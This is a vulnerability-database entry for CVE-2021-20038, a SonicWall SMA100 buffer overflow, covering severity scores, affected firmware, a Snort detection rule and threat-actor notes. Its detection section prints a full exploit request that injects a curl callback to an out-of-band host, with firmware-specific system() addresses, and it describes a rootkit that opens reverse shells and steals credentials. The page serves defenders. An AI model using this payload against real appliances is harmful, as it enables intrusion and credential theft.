cbcvebase.
CVE-2021-20038
published 2021-12-08

CVE-2021-20038: A Stack-based buffer overflow vulnerability in SMA100 Apache httpd server's mod_cgi module environment variables allows a remote unauthenticated attacker to…

PriorityP1100critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITRansomwareInitial access
CISA Known Exploited Vulnerabilitydue 2022-02-11
Exploited in the wild
EPSS
99.91%
100.0th percentile
A Stack-based buffer overflow vulnerability in SMA100 Apache httpd server's mod_cgi module environment variables allows a remote unauthenticated attacker to potentially execute code as a 'nobody' user in the appliance. This vulnerability affected SMA 200, 210, 400, 410 and 500v appliances firmware 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv and earlier versions.

Affected

18 ranges
VendorProductVersion rangeFixed in
sonicwallsma_200_firmware
sonicwallsma_200_firmware
sonicwallsma_200_firmware
sonicwallsma_210_firmware
sonicwallsma_210_firmware
sonicwallsma_210_firmware
sonicwallsma_400_firmware
sonicwallsma_400_firmware
sonicwallsma_400_firmware
sonicwallsma_410_firmware
sonicwallsma_410_firmware
sonicwallsma_410_firmware
sonicwallsma_500v_firmware
sonicwallsma_500v_firmware
sonicwallsma_500v_firmware
sonicwallsonicwall_sma100
sonicwallsonicwall_sma100
sonicwallsonicwall_sma100

Detection & IOCsextracted from sources · hover to see the quote

commandGET /{{prefix_addr}}{{system_addr}};{curl,http://{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'};{{prefix_addr}}{{system_addr}};{curl,http://{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'};?{{repeat("A", 518)}} HTTP/1.1
snort
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT SonicWall SMA Stack-Based Buffer Overflow CVE-2021-20038 M1"; flow:established,to_server; urilen:>400; threshold: type threshold, track by_src, count 10, seconds 30; http.request_line; content:"GET /%"; startswith; pcre:"/^[a-zA-Z0-9]{2}[%a-zA-Z0-9]{9}(?P(?:[%a-zA-Z0-9]{3}){4})(?P=addr)/R"; content:"%64%b8%06%08"; within:55; fast_pattern; content:"?"; reference:cve,2021-20038; classtype:attempted-admin; sid:2034984; rev:2; metadata:attack_target Server, created_at 2022_01_26, cve CVE_2021_20038, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2024_03_08, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
bytes
%64%b8%06%08
bytes
%08%b7%06%08
bytes
%64%b8%06%08
bytes
%04%d7%7f%bf%18%d8%7f%bf%18%d8%7f%bf
  • The exploit payload encodes a stack address (%04%d7%7f%bf%18%d8%7f%bf%18%d8%7f%bf) followed by a system() address specific to the firmware version, then a shell command injection via brace expansion (curl), and a 518-byte 'A' padding — all within a single GET request URI.
  • Two distinct system() address values are used depending on firmware version: %08%b7%06%08 targets firmware 10.2.1.2-24sv, and %64%b8%06%08 targets firmware 10.2.1.1-17sv/19sv.
  • The vulnerability is in the SMA100 Apache httpd mod_cgi module environment variables; code executes as the 'nobody' user. Affected appliances: SMA 200, 210, 400, 410, 500v.
  • UNC6148 threat actor exploited CVE-2021-20038 (among other n-days) to steal administrator credentials before the targeted SMA appliance was updated to firmware 10.2.1.15-81sv. Credential theft artifact: persist.db database and certificate files.
  • OVERSTEP rootkit is deployed as a .ELF file decoded from base64 on SMA 100 series appliances; it establishes a reverse shell, steals passwords, and hides components using user-mode rootkit capabilities. Analysts should acquire disk images to detect it, as the rootkit interferes with live forensics.
  • OVERSTEP can steal sensitive files such as the persist.db database and certificate files, which give hackers access to credentials, OTP seeds, and certificates that allow persistence.
  • Threshold-based detection: trigger on 10 or more exploit attempts from the same source IP within 30 seconds to reduce false positives.
  • ·The system() address offsets in the exploit payload are firmware-version-specific. %08%b7%06%08 applies only to 10.2.1.2-24sv and %64%b8%06%08 applies only to 10.2.1.1-17sv/19sv; detections relying solely on one address will miss exploitation attempts targeting the other firmware version.
  • ·The Nuclei template uses a clusterbomb attack combining two prefix_addr and two system_addr payloads, requiring up to 2 HTTP requests (max-request: 2) to cover both firmware variants — detection infrastructure must account for multi-request exploit sequences.
  • ·Incident responders could not confirm which specific vulnerability UNC6148 exploited for initial credential theft; CVE-2021-20038 is one of several candidates (also CVE-2024-38475, CVE-2021-20035, CVE-2021-20039, CVE-2025-32819).

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.